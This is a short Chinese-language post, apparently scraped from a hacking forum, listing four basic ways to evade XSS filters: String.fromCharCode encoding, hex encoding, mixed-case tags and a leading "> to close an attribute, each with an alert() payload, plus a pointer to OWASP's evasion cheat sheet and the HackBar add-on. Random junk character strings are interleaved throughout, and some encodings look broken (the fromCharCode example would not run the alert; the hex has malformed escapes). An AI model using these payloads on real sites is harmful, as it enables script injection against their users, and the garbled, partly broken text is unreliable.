四种超级基础的绕过方法。
/ ?3 L% f* J4 u4 {! c) Q2 e, b1.转换为ASCII码) Z7 ]. a% m) ~( C
例子:原脚本为<script>alert(‘I love F4ck’)</script >
9 g: H: }% O/ E3 O# n6 ]通过转换,变成:
& q2 T! l, @: _<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>* Q* n" U2 T7 M: v
9 s9 p: w; R$ i# s- x7 h
2.转换为HEX(十六进制)9 s# l8 S. s5 J. a. o) b: T
例子:原脚本为<script>alert(‘I love F4ck’)</script>' P8 s6 H" Q, \9 K
通过转换,变成:
& u0 ^. G9 q. l# J) I& k%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e$ s+ f( Q2 T* X# q& c. S: H
. r; L6 ?, a/ C* s3.转换脚本的大小写
5 m3 _, n3 U, o7 T$ Q# U8 a/ p例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 T$ a, w% T& m; ]) k. k转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>+ V- Q! _; W$ J. `& R# j# \
) Q* I3 p8 z: s) X4.增加闭合标记”>
, l* t q" w6 s* E$ _例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 ^4 ^" e9 R" F$ H/ P" X转换为:”><script>alert(‘I love F4ck’)</script>
: _6 ~0 X# e' c3 L2 t. q5 l更详细绕过技术请参考此网页2 A5 w3 R, |$ N
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
; z) ?- O! i( V 8 V9 L: _. l* @5 h6 M" A8 v% e
转换工具使用的是火狐的 hackbar mozilla addon. |